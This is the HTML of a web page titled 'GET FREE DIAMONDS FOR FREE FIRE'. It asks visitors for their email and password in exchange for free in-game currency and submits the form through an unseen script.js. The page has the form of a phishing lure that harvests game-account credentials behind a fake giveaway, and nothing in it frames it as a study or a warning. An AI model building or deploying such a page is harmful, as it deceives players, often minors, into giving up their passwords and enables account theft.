<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>GET FREE DIAMONDS FOR FREE FIRE</title>
    <link rel="stylesheet" href="styles.css">
</head>
<body>
    <div class="container">
        <h1>GET FREE DIAMONDS FOR FREE FIRE</h1>
        <form id="diamondForm">
            <label for="email">Email:</label>
            <input type="email" id="email" required>
            
            <label for="password">Password:</label>
            <input type="password" id="password" required>

            <button type="submit">Get Diamonds</button>
        </form>
        <div id="message"></div>
    </div>

    <script src="script.js"></script>
</body>
</html>
